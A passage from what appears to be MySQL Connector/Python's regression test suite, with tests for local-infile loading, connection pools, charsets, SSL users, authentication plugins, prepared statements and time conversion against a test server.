"CREATE TABLE local_data (id int, c1 VARCHAR(6), c2 VARCHAR(6))")
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query("DROP TABLE IF EXISTS local_data")
cnx.close()
@foreach_cnx(allow_local_infile=True)
def test_load_csv(self):
self._setup()
cur = self.cnx.cursor()
sql = "LOAD DATA LOCAL INFILE %s INTO TABLE local_data"
cur.execute(sql, (self.data_file,))
cur.execute("SELECT * FROM local_data")
exp = [
(1, 'c1_1', 'c2_1'), (2, 'c1_2', 'c2_2'),
(3, 'c1_3', 'c2_3'), (4, 'c1_4', 'c2_4'),
(5, 'c1_5', 'c2_5'), (6, 'c1_6', 'c2_6')]
self.assertEqual(exp, cur.fetchall())
@cnx_config(compress=True, allow_local_infile=True)
@foreach_cnx()
def test_load_csv_with_compress(self):
self._setup()
cur = self.cnx.cursor()
sql = "LOAD DATA LOCAL INFILE %s INTO TABLE local_data"
cur.execute(sql, (self.data_file,))
cur.execute("SELECT * FROM local_data")
exp = [
(1, 'c1_1', 'c2_1'), (2, 'c1_2', 'c2_2'),
(3, 'c1_3', 'c2_3'), (4, 'c1_4', 'c2_4'),
(5, 'c1_5', 'c2_5'), (6, 'c1_6', 'c2_6')]
self.assertEqual(exp, cur.fetchall())
@foreach_cnx(allow_local_infile=True)
def test_filenotfound(self):
self._setup()
cur = self.cnx.cursor()
sql = "LOAD DATA LOCAL INFILE %s INTO TABLE local_data"
try:
cur.execute(sql, (self.data_file + '_spam',))
except (errors.InterfaceError, errors.DatabaseError) as exc:
self.assertTrue(
'not found' in str(exc) or 'could not be read' in str(exc),
'Was: ' + str(exc))
class BugOra17002411(tests.MySQLConnectorTests):
"""BUG#17002411: LOAD DATA LOCAL INFILE FAILS WITH BIGGER FILES
"""
def setUp(self):
self.data_file = os.path.join('tests', 'data', 'local_data_big.csv')
self.exp_rows = 33000
with open(self.data_file, 'w') as fp:
i = 0
while i < self.exp_rows:
fp.write("{0}\t{1}\n".format('a' * 255, 'b' * 255))
i += 1
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS local_data")
cur.execute(
"CREATE TABLE local_data ("
"id INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(255), c2 VARCHAR(255))"
)
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query("DROP TABLE IF EXISTS local_data")
os.unlink(self.data_file)
cnx.close()
@foreach_cnx(allow_local_infile=True)
def test_load_csv(self):
self._setup()
cur = self.cnx.cursor()
sql = "LOAD DATA LOCAL INFILE %s INTO TABLE local_data (c1, c2)"
cur.execute(sql, (self.data_file,))
cur.execute("SELECT COUNT(*) FROM local_data")
self.assertEqual(self.exp_rows, cur.fetchone()[0])
@unittest.skipIf(tests.MYSQL_VERSION >= (8, 0, 1),
"BugOra17422299 not tested with MySQL version >= 8.0.1")
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 1),
"BugOra17422299 not tested with MySQL version 5.6")
class BugOra17422299(tests.MySQLConnectorTests):
"""BUG#17422299: cmd_shutdown fails with malformed connection packet
"""
def setUp(self):
self.config = tests.get_mysql_config()
self.mysql_server = tests.MYSQL_SERVERS[0]
def tearDown(self):
self.ensure_up()
def ensure_up(self):
# Start the MySQL server again
if not self.mysql_server.check_running():
self.mysql_server.start()
if not self.mysql_server.wait_up():
self.fail("Failed restarting MySQL server after test")
def test_shutdown(self):
for cnx_class in self.all_cnx_classes:
self.ensure_up()
cnx = cnx_class(**self.config)
try:
cnx.cmd_shutdown()
except mysql.connector.DatabaseError as err:
self.fail("COM_SHUTDOWN failed: {0}".format(err))
if not self.mysql_server.wait_down():
self.fail("MySQL not shut down after COM_SHUTDOWN")
def test_shutdown__with_type(self):
for cnx_class in self.all_cnx_classes:
self.ensure_up()
cnx = cnx_class(**self.config)
try:
cnx.cmd_shutdown(
constants.ShutdownType.SHUTDOWN_WAIT_ALL_BUFFERS)
except mysql.connector.DatabaseError as err:
self.fail("COM_SHUTDOWN failed: {0}".format(err))
if not self.mysql_server.wait_down():
self.fail("MySQL not shut down after COM_SHUTDOWN")
class BugOra17215197(tests.MySQLConnectorTests):
"""BUG#17215197: MYSQLCONNECTION.CURSOR(PREPARED=TRUE) NOT POSSIBLE
"""
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra17215197")
cur.execute("CREATE TABLE BugOra17215197 (c1 INT, c2 INT)")
cur.executemany("INSERT INTO BugOra17215197 VALUES (%s, %s)",
[(1, 10), (2, 20), (3, 30)])
cnx.commit()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query("DROP TABLE IF EXISTS BugOra17215197")
@foreach_cnx()
def test_prepared_argument(self):
self._setup()
cur = self.cnx.cursor(prepared=True)
prep_stmt = "SELECT * FROM BugOra17215197 WHERE c1 = %s AND c2 = %s"
exp = [(1, 10)]
cur.execute(prep_stmt, (1, 10))
self.assertEqual(exp, cur.fetchall())
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class BugOra17414258(tests.MySQLConnectorTests):
"""BUG#17414258: IT IS ALLOWED TO CHANGE SIZE OF ACTIVE POOL
"""
def setUp(self):
self.config = tests.get_mysql_config()
self.config['pool_name'] = 'test'
self.config['pool_size'] = 3
if tests.MYSQL_VERSION < (5, 7):
self.config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
def tearDown(self):
# Remove pools created by test
del mysql.connector._CONNECTION_POOLS[self.config['pool_name']]
def test_poolsize(self):
cnx = mysql.connector.connect(**self.config)
cnx.close()
newconfig = self.config.copy()
newconfig['pool_size'] = self.config['pool_size'] + 1
self.assertRaises(mysql.connector.PoolError,
mysql.connector.connect, **newconfig)
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class Bug17578937(tests.MySQLConnectorTests):
"""CONNECTION POOL DOES NOT HANDLE A NOT AVAILABLE MYSQL SERVER"""
def setUp(self):
self.mysql_server = tests.MYSQL_SERVERS[0]
def tearDown(self):
# Start the MySQL server again
if not self.mysql_server.check_running():
self.mysql_server.start()
if not self.mysql_server.wait_up():
self.fail("Failed restarting MySQL server after test")
def test_get_connection(self):
"""Test reconnect once MySQL server is back
To make the test case simpler, we create a pool which only has
one connection in the queue. This way we can similuate getting a
connection from a pool for which the MySQL server is not running.
"""
config = tests.get_mysql_config().copy()
if tests.MYSQL_VERSION < (5, 7):
config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
config['connection_timeout'] = 2
cnxpool = pooling.MySQLConnectionPool(
pool_name='test', pool_size=1, **config)
pcnx = cnxpool.get_connection()
self.assertTrue(isinstance(pcnx, pooling.PooledMySQLConnection))
pcnx.close()
self.mysql_server.stop()
if not self.mysql_server.wait_down():
self.fail("MySQL not shut down; can not continue test")
self.assertRaises(errors.InterfaceError, cnxpool.get_connection)
self.mysql_server.start()
if not self.mysql_server.wait_up():
self.fail("MySQL started; can not continue test")
pcnx = cnxpool.get_connection()
pcnx.close()
class BugOra17079344(tests.MySQLConnectorTests):
"""BUG#17079344: ERROR WITH GBK STRING WITH CHARACTERS ENCODED AS BACKSLASH
"""
def setUp(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
for charset in ('gbk', 'sjis', 'big5'):
tablename = charset + 'test'
cur.execute("DROP TABLE IF EXISTS {0}".format(tablename))
table = (
"CREATE TABLE {table} ("
"id INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(40)"
") CHARACTER SET '{charset}'"
).format(table=tablename, charset=charset)
cur.execute(table)
cnx.commit()
cur.close()
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
for charset in ('gbk', 'sjis', 'big5'):
tablename = charset + 'test'
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(tablename))
cnx.close()
def _test_charset(self, charset, data):
config = tests.get_mysql_config()
config['charset'] = charset
config['use_unicode'] = True
self.cnx = self.cnx.__class__(**config)
tablename = charset + 'test'
cur = self.cnx.cursor()
cur.execute("TRUNCATE {0}".format(tablename))
self.cnx.commit()
insert = "INSERT INTO {0} (c1) VALUES (%s)".format(tablename)
for value in data:
cur.execute(insert, (value,))
self.cnx.commit()
cur.execute("SELECT id, c1 FROM {0} ORDER BY id".format(tablename))
for row in cur:
self.assertEqual(data[row[0] - 1], row[1])
cur.close()
self.cnx.close()
@foreach_cnx()
def test_gbk(self):
self._test_charset('gbk', [u'赵孟頫', u'赵\孟\頫\\', u'遜', ])
@foreach_cnx()
def test_sjis(self):
self._test_charset('sjis', ['\u005c'])
@foreach_cnx()
def test_big5(self):
self._test_charset('big5', ['\u5C62'])
class BugOra17780576(tests.MySQLConnectorTests):
"""BUG#17780576: CHARACTER SET 'UTF8MB4' UNSUPPORTED
"""
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS utf8mb4test")
cur.close()
cnx.close()
@foreach_cnx()
def test_utf8mb4(self):
if tests.MYSQL_VERSION < (5, 5, 0):
# Test only valid for MySQL 5.5.0 and later.
return
config = tests.get_mysql_config()
tablename = 'utf8mb4test'
self.cnx.set_charset_collation('utf8mb4', 'utf8mb4_general_ci')
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(tablename))
table = (
"CREATE TABLE {table} ("
"id INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(40) CHARACTER SET 'utf8mb4'"
") CHARACTER SET 'utf8mb4'"
).format(table=tablename)
cur.execute(table)
insert = "INSERT INTO {0} (c1) VALUES (%s)".format(tablename)
data = [u'😉😍', u'😃😊', u'😄😘😚', ]
for value in data:
cur.execute(insert, (value,))
cur.execute("SELECT id, c1 FROM {0} ORDER BY id".format(tablename))
for row in cur:
self.assertEqual(data[row[0] - 1], row[1])
cur.close()
self.cnx.close()
class BugOra17573172(tests.MySQLConnectorTests):
"""BUG#17573172: MISSING SUPPORT FOR READ-ONLY TRANSACTIONS
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.cur.execute("DROP TABLE IF EXISTS BugOra17573172")
self.cur.execute("CREATE TABLE BugOra17573172 (c1 INT, c2 INT)")
self.cur.executemany("INSERT INTO BugOra17573172 VALUES (%s, %s)",
[(1, 10), (2, 20), (3, 30)])
self.cnx.commit()
def test_read_only(self):
if self.cnx.get_server_version() < (5, 6, 5):
self.assertRaises(ValueError, self.cnx.start_transaction,
readonly=True)
else:
self.cnx.start_transaction(readonly=True)
self.assertTrue(self.cnx.in_transaction)
self.assertRaises(errors.ProgrammingError,
self.cnx.start_transaction)
query = "INSERT INTO BugOra17573172 VALUES(4, 40)"
self.assertRaises(errors.ProgrammingError, self.cur.execute, query)
self.cnx.rollback()
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS BugOra17573172")
self.cur.close()
class BugOra17826833(tests.MySQLConnectorTests):
"""BUG#17826833: EXECUTEMANY() FOR INSERTS W/O VALUES
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
self.emp_tbl = 'Bug17826833_emp'
self.cursor.execute("DROP TABLE IF EXISTS %s" % (self.emp_tbl))
self.city_tbl = 'Bug17826833_city'
self.cursor.execute("DROP TABLE IF EXISTS %s" % (self.city_tbl))
create = ("CREATE TABLE %s ( "
"`id` int(11) NOT NULL, "
"`name` varchar(20) NOT NULL , "
"`phone` varchar(20), "
"PRIMARY KEY (`id`))" % (self.emp_tbl))
self.cursor.execute(create)
create = ("CREATE TABLE %s ( "
"`id` int(11) NOT NULL, "
"`name` varchar(20) NOT NULL, "
"PRIMARY KEY (`id`))" % (self.city_tbl))
self.cursor.execute(create)
def tearDown(self):
self.cursor.execute("DROP TABLE IF EXISTS {0}".format(self.city_tbl))
self.cursor.execute("DROP TABLE IF EXISTS {0}".format(self.emp_tbl))
def test_executemany(self):
stmt = "INSERT INTO {0} (id,name) VALUES (%s,%s)".format(
self.city_tbl)
self.cursor.executemany(stmt, [(1, 'ABC'), (2, 'CDE'), (3, 'XYZ')])
query = ("INSERT INTO %s (id, name, phone)"
"SELECT id,name,%%s FROM %s WHERE name=%%s") % (self.emp_tbl,
self.city_tbl)
try:
self.cursor.executemany(query, [('4567', 'CDE'), ('1234', 'XYZ')])
stmt = "SELECT * FROM {0}".format(self.emp_tbl)
self.cursor.execute(stmt)
self.assertEqual([(2, 'CDE', '4567'), (3, 'XYZ', '1234')],
self.cursor.fetchall(), "INSERT ... SELECT failed")
except errors.ProgrammingError as err:
self.fail("Regular expression fails with executemany(): %s" %
err)
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class BugOra18040042(tests.MySQLConnectorTests):
"""BUG#18040042: Reset session closing pooled Connection"""
def test_clear_session(self):
pool_config = tests.get_mysql_config()
if tests.MYSQL_VERSION < (5, 7):
pool_config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
cnxpool = pooling.MySQLConnectionPool(
pool_name='test', pool_size=1, **pool_config)
pcnx = cnxpool.get_connection()
exp_session_id = pcnx.connection_id
pcnx.cmd_query("SET @ham = 2")
pcnx.close()
pcnx = cnxpool.get_connection()
pcnx.cmd_query("SELECT @ham")
self.assertEqual(exp_session_id, pcnx.connection_id)
self.assertNotEqual(('2',), pcnx.get_rows()[0][0])
def test_do_not_clear_session(self):
cnxpool = pooling.MySQLConnectionPool(
pool_name='test', pool_size=1, pool_reset_session=False,
**tests.get_mysql_config())
pcnx = cnxpool.get_connection()
exp_session_id = pcnx.connection_id
pcnx.cmd_query("SET @ham = 2")
pcnx.close()
pcnx = cnxpool.get_connection()
pcnx.cmd_query("SELECT @ham")
self.assertEqual(exp_session_id, pcnx.connection_id)
self.assertEqual((2,), pcnx.get_rows()[0][0])
class BugOra17965619(tests.MySQLConnectorTests):
"""BUG#17965619: CALLPROC FUNCTION WITH BYTES PARAMETERS
"""
def setUp(self):
self.cnx = connection.MySQLConnection(**tests.get_mysql_config())
procedure = ("DROP PROCEDURE IF EXISTS `proce_with_binary`")
self.cnx.cmd_query(procedure)
procedure = ("CREATE PROCEDURE `proce_with_binary` "
"(data VARBINARY(512)) BEGIN END;")
self.cnx.cmd_query(procedure)
def tearDown(self):
procedure = ("DROP PROCEDURE IF EXISTS `proce_with_binary`")
self.cnx.cmd_query(procedure)
self.cnx.close()
def test_callproc(self):
cur = self.cnx.cursor()
data = b'\xf0\xf1\xf2'
output = cur.callproc('proce_with_binary', ((data, 'BINARY'),))
self.assertEqual((data,), output)
cur.close()
class BugOra17054848(tests.MySQLConnectorTests):
"""BUG#17054848: USE OF SSL SHOULD NOT REQUIRE SSL_CERT AND SSL_KEY
"""
def setUp(self):
config = tests.get_mysql_config()
self.admin_cnx = connection.MySQLConnection(**config)
if tests.MYSQL_VERSION < (5, 7, 21):
self.admin_cnx.cmd_query(
"GRANT ALL ON %s.* TO 'ssluser'@'%s' REQUIRE SSL" % (
config['database'], config['host']))
else:
self.admin_cnx.cmd_query(
"CREATE USER 'ssluser'@'{host}'".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
self.admin_cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}'".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
self.admin_cnx.cmd_query(
"ALTER USER 'ssluser'@'{host}' REQUIRE SSL".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
def tearDown(self):
config = tests.get_mysql_config()
self.admin_cnx.cmd_query("DROP USER 'ssluser'@'%s'" % (
config['host']))
def test_ssl(self):
if not tests.SSL_AVAILABLE:
tests.MESSAGES['WARNINGS'].append(
"BugOra16217667 test failed. Python lacks SSL support.")
return
ssl_ca = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'))
ssl_key = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_key.pem'))
config = tests.get_mysql_config()
config['user'] = 'ssluser'
config['password'] = ''
config['unix_socket'] = None
config['ssl_verify_cert'] = False
config.update({
'ssl_ca': ssl_ca,
'ssl_cipher': 'AES256-SHA',
})
try:
cnx = connection.MySQLConnection(**config)
except errors.ProgrammingError:
self.fail("Failed authentication with SSL")
cnx.cmd_query("SHOW STATUS LIKE 'Ssl_cipher'")
res = cnx.get_rows()[0][0]
self.assertTrue(res != '')
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0),
"BugOra16217765 not tested with MySQL version < 5.6.7. "
"Not working with cross version MySQL lib< 8.0.")
class BugOra16217765(tests.MySQLConnectorTests):
"""BUG#16217765: Fix authentication plugin support
"""
users = {
'sha256user': {
'username': 'sha256user',
'password': 'sha256P@ss',
'auth_plugin': 'sha256_password',
},
'nativeuser': {
'username': 'nativeuser',
'password': 'nativeP@ss',
'auth_plugin': 'mysql_native_password',
},
'sha256user_np': {
'username': 'sha256user_np',
'password': '',
'auth_plugin': 'sha256_password',
},
'nativeuser_np': {
'username': 'nativeuser_np',
'password': '',
'auth_plugin': 'mysql_native_password',
},
}
def _create_user(self, cnx, user, password, host, database,
plugin):
self._drop_user(cnx, user, host)
create_user = ("CREATE USER '{user}'@'{host}' "
"IDENTIFIED WITH {plugin}")
cnx.cmd_query(create_user.format(user=user, host=host, plugin=plugin))
if tests.MYSQL_VERSION[0:3] < (8, 0, 5):
if plugin == 'sha256_password':
cnx.cmd_query("SET old_passwords = 2")
else:
cnx.cmd_query("SET old_passwords = 0")
if tests.MYSQL_VERSION < (5, 7, 5):
passwd = ("SET PASSWORD FOR '{user}'@'{host}' = "
"PASSWORD('{password}')").format(user=user, host=host,
password=password)
else:
passwd = ("ALTER USER '{user}'@'{host}' IDENTIFIED BY "
"'{password}'").format(user=user, host=host,
password=password)
cnx.cmd_query(passwd)
grant = "GRANT ALL ON {database}.* TO '{user}'@'{host}'"
cnx.cmd_query(grant.format(database=database, user=user, host=host))
def _drop_user(self, cnx, user, host):
try:
self.admin_cnx.cmd_query("DROP USER '{user}'@'{host}'".format(
host=host,
user=user))
except errors.DatabaseError:
# It's OK when drop fails
pass
def setUp(self):
self.errmsg = "AuthPlugin {0} failed: {1}"
config = tests.get_mysql_config()
self.host = config['host']
self.admin_cnx = connection.MySQLConnection(**config)
for key, user in self.users.items():
self._create_user(self.admin_cnx, user['username'],
user['password'],
self.host,
config['database'],
plugin=user['auth_plugin'])
def tearDown(self):
for key, user in self.users.items():
self._drop_user(self.admin_cnx, user['username'], self.host)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 6, 6),
"MySQL {0} does not support sha256_password auth".format(
tests.MYSQL_VERSION_TXT))
@unittest.skipIf(
not tests.SSL_AVAILABLE,
"BugOra16217765.test_sha256 test skipped: SSL support not available")
def test_sha256(self):
config = tests.get_mysql_config()
config['unix_socket'] = None
config.update({
'ssl_ca': tests.SSL_CA,
'ssl_cert': tests.SSL_CERT,
'ssl_key': tests.SSL_KEY,
'ssl_cipher': 'AES256-SHA',
})
user = self.users['sha256user']
config['user'] = user['username']
config['password'] = user['password']
config['client_flags'] = [constants.ClientFlag.PLUGIN_AUTH,
-constants.ClientFlag.CONNECT_ARGS]
config['auth_plugin'] = user['auth_plugin']
try:
cnx = connection.MySQLConnection(**config)
except Exception as exc:
import traceback
traceback.print_exc()
self.fail(self.errmsg.format(config['auth_plugin'], exc))
try:
cnx.cmd_change_user(config['user'], config['password'])
except:
self.fail("Changing user using sha256_password auth failed "
"with pure Python connector. \nflags on cnx: {} \n"
"".format(config['client_flags']))
if CMySQLConnection:
try:
cnx = CMySQLConnection(**config)
except Exception as exc:
import traceback
traceback.print_exc()
self.fail(self.errmsg.format(config['auth_plugin'], exc))
try:
cnx.cmd_change_user(config['user'], config['password'])
except:
self.fail("Changing user using sha256_password auth failed "
"with CExtension")
@unittest.skipIf(tests.MYSQL_VERSION < (5, 6, 6),
"MySQL {0} does not support sha256_password auth".format(
tests.MYSQL_VERSION_TXT))
def test_sha256_nonssl(self):
config = tests.get_mysql_config()
config['unix_socket'] = None
config['ssl_disabled'] = True
config['client_flags'] = [constants.ClientFlag.PLUGIN_AUTH]
user = self.users['sha256user']
config['user'] = user['username']
config['password'] = user['password']
config['auth_plugin'] = user['auth_plugin']
self.assertRaises(errors.InterfaceError, connection.MySQLConnection,
**config)
if CMySQLConnection:
self.assertRaises(errors.InterfaceError, CMySQLConnection, **config)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 5, 7),
"MySQL {0} does not support authentication plugins".format(
tests.MYSQL_VERSION_TXT))
def test_native(self):
config = tests.get_mysql_config()
config['unix_socket'] = None
user = self.users['nativeuser']
config['user'] = user['username']
config['password'] = user['password']
config['client_flags'] = [constants.ClientFlag.PLUGIN_AUTH]
config['auth_plugin'] = user['auth_plugin']
try:
cnx = connection.MySQLConnection(**config)
except Exception as exc:
self.fail(self.errmsg.format(config['auth_plugin'], exc))
if CMySQLConnection:
try:
cnx = CMySQLConnection(**config)
except Exception as exc:
self.fail(self.errmsg.format(config['auth_plugin'], exc))
class BugOra18144971(tests.MySQLConnectorTests):
"""BUG#18144971 ERROR WHEN USING UNICODE ARGUMENTS IN PREPARED STATEMENT"""
def setUp(self):
self.table = 'Bug18144971'
self.table_cp1251 = 'Bug18144971_cp1251'
def _setup(self):
config = tests.get_mysql_config()
config['use_unicode'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table))
create = ("CREATE TABLE {0} ( "
"`id` int(11) NOT NULL, "
"`name` varchar(40) NOT NULL , "
"`phone` varchar(40), "
"PRIMARY KEY (`id`))"
" CHARACTER SET 'utf8'".format(self.table))
cur.execute(create)
cur.execute(
"DROP TABLE IF EXISTS {0}".format(self.table_cp1251)
)
create = ("CREATE TABLE {0} ( "
"`id` int(11) NOT NULL, "
"`name` varchar(40) NOT NULL , "
"`phone` varchar(40), "
"PRIMARY KEY (`id`))"
" CHARACTER SET 'cp1251'".format(self.table_cp1251))
cur.execute(create)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
config['use_unicode'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table))
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_cp1251))
@cnx_config(use_unicode=True)
@foreach_cnx()
def test_prepared_statement(self):
self._setup()
cur = self.cnx.cursor(prepared=True)
stmt = "INSERT INTO {0} VALUES (?,?,?)".format(
self.table)
data = [(1, b'bytes', '1234'), (2, u'aaaаффф', '1111')]
exp = [(1, 'bytes', '1234'), (2, u'aaaаффф', '1111')]
cur.execute(stmt, data[0])
self.cnx.commit()
cur.execute("SELECT * FROM {0}".format(self.table))
self.assertEqual(cur.fetchall(), [exp[0]])
config = tests.get_mysql_config()
config['charset'] = 'cp1251'
self.cnx = self.cnx.__class__(**config)
cur = self.cnx.cursor(prepared=True)
stmt = "INSERT INTO {0} VALUES (?,?,?)".format(
self.table_cp1251)
cur.execute(stmt, data[1])
self.cnx.commit()
cur.execute("SELECT * FROM {0}".format(self.table_cp1251))
self.assertEqual(cur.fetchall(), [exp[1]])
class BugOra18389196(tests.MySQLConnectorTests):
"""BUG#18389196: INSERTING PARAMETER MULTIPLE TIMES IN STATEMENT
"""
def setUp(self):
self.tbl = 'Bug18389196'
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS %s" % self.tbl)
create = ("CREATE TABLE %s ( "
"`id` int(11) NOT NULL, "
"`col1` varchar(20) NOT NULL, "
"`col2` varchar(20) NOT NULL, "
"PRIMARY KEY (`id`))" % self.tbl)
cur.execute(create)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS %s" % self.tbl)
cnx.close()
@foreach_cnx()
def test_parameters(self):
self.cnx.cmd_query("TRUNCATE {0}".format(self.tbl))
cur = self.cnx.cursor()
stmt = ("INSERT INTO {0} (id,col1,col2) VALUES "
"(%(id)s,%(name)s,%(name)s)".format(
self.tbl))
try:
cur.execute(stmt, {'id': 1, 'name': 'ABC'})
except errors.ProgrammingError as err:
self.fail("Inserting parameter multiple times in a statement "
"failed: %s" % err)
cur.close()
@unittest.skipIf(tests.MYSQL_VERSION >= (5, 7, 5),
"MySQL {0} does not support old password auth".format(
tests.MYSQL_VERSION_TXT))
class BugOra18415927(tests.MySQLConnectorTests):
"""BUG#18415927: AUTH_RESPONSE VARIABLE INCREMENTED WITHOUT BEING DEFINED
"""
user = {
'username': 'nativeuser',
'password': 'nativeP@ss',
}
def setUp(self):
config = tests.get_mysql_config()
host = config['host']
database = config['database']
cnx = connection.MySQLConnection(**config)
try:
cnx.cmd_query("DROP USER '{user}'@'{host}'".format(
host=host,
user=self.user['username']))
except:
pass
create_user = "CREATE USER '{user}'@'{host}' "
cnx.cmd_query(create_user.format(user=self.user['username'],
host=host))
passwd = ("SET PASSWORD FOR '{user}'@'{host}' = "
"PASSWORD('{password}')").format(
user=self.user['username'], host=host,
password=self.user['password'])
cnx.cmd_query(passwd)
grant = "GRANT ALL ON {database}.* TO '{user}'@'{host}'"
cnx.cmd_query(grant.format(database=database,
user=self.user['username'],
host=host))
def tearDown(self):
config = tests.get_mysql_config()
host = config['host']
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP USER '{user}'@'{host}'".format(
host=host,
user=self.user['username']))
def test_auth_response(self):
config = tests.get_mysql_config()
config['unix_socket'] = None
config['user'] = self.user['username']
config['password'] = self.user['password']
config['client_flags'] = [-constants.ClientFlag.SECURE_CONNECTION,
-constants.ClientFlag.CONNECT_WITH_DB]
try:
cnx = connection.MySQLConnection(**config)
except Exception as exc:
self.fail("Connection failed: {0}".format(exc))
class BugOra18527437(tests.MySQLConnectorTests):
"""BUG#18527437: UNITTESTS FAILING WHEN --host=::1 IS PASSED AS ARGUMENT
"""
def test_poolname(self):
config = tests.get_mysql_config()
config['host'] = '::1'
config['pool_size'] = 3
exp = '{0}_{1}_{2}_{3}'.format(config['host'], config['port'],
config['user'], config['database'])
self.assertEqual(exp, pooling.generate_pool_name(**config))
def test_custom_poolname(self):
cnxpool = pooling.MySQLConnectionPool(pool_name='ham:spam',
**tests.get_mysql_config())
self.assertEqual('ham:spam', cnxpool._pool_name)
cnxpool._remove_connections()
class BugOra18694096(tests.MySQLConnectorTests):
"""
BUG#18694096: INCORRECT CONVERSION OF NEGATIVE TIMEDELTA
"""
cases = [
(timedelta(hours=0, minutes=0, seconds=1, microseconds=0),
'00:00:01',),
(timedelta(hours=0, minutes=0, seconds=-1, microseconds=0),
'-00:00:01'),
(timedelta(hours=0, minutes=1, seconds=1, microseconds=0),
'00:01:01'),
(timedelta(hours=0, minutes=-1, seconds=-1, microseconds=0),
'-00:01:01'),
(timedelta(hours=1, minutes=1, seconds=1, microseconds=0),
'01:01:01'),
(timedelta(hours=-1, minutes=-1, seconds=-1, microseconds=0),
'-01:01:01'),
(timedelta(days=3, seconds=86401),
'96:00:01'),
(timedelta(days=-3, seconds=86401),
'-47:59:59'),
]
# Cases for MySQL 5.6.4 and higher
cases_564 = [
(timedelta(hours=0, minutes=0, seconds=0, microseconds=1),
'00:00:00.000001'),
(timedelta(hours=0, minutes=0, seconds=0, microseconds=-1),
'-00:00:00.000001'),
(timedelta(days=2, hours=0, microseconds=1),
'48:00:00.000001'),
(timedelta(days=-3, seconds=86399, microseconds=999999),
'-48:00:00.000001'),
]
def setUp(self):
config = tests.get_mysql_config()
self.cnx = mysql.connector.connect(**config)
self.tbl = 'times'
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
if tests.MYSQL_VERSION >= (5, 6, 4):
create = "CREATE TABLE {0} (c1 TIME(6))".format(self.tbl)
self.cases += self.cases_564
else:
create = "CREATE TABLE {0} (c1 TIME)".format(self.tbl)
self.cnx.cmd_query(create)
def tearDown(self):
if self.cnx:
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
def test_timedelta(self):
# Note that both _timedelta_to_mysql and _TIME_to_python are
# tested
cur = self.cnx.cursor()
# Following uses _timedelta_to_mysql to insert data
data = [(case[0],) for case in self.cases]
cur.executemany("INSERT INTO {0} (c1) VALUES (%s)".format(self.tbl),
data)
self.cnx.commit()
# We use _TIME_to_python to convert back to Python
cur.execute("SELECT c1 FROM {0}".format(self.tbl))
for i, row in enumerate(cur.fetchall()):
self.assertEqual(self.cases[i][0], row[0],
"Incorrect timedelta for {0}, was {1!r}".format(
self.cases[i][1], row[0]))
class BugOra18220593(tests.MySQLConnectorTests):
"""BUG#18220593 MYSQLCURSOR.EXECUTEMANY() DOESN'T LIKE UNICODE OPERATIONS
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.table = u"⽃⽄⽅⽆⽇⽈⽉⽊"
self.cur.execute(u"DROP TABLE IF EXISTS {0}".format(self.table))
self.cur.execute(u"CREATE TABLE {0} (c1 VARCHAR(100)) "
u"CHARACTER SET 'utf8'".format(self.table))
def test_unicode_operation(self):
data = [('database',), (u'データベース',), (u'데이터베이스',)]
self.cur.executemany(u"INSERT INTO {0} VALUES (%s)".format(
self.table), data)
self.cnx.commit()
self.cur.execute(u"SELECT c1 FROM {0}".format(self.table))
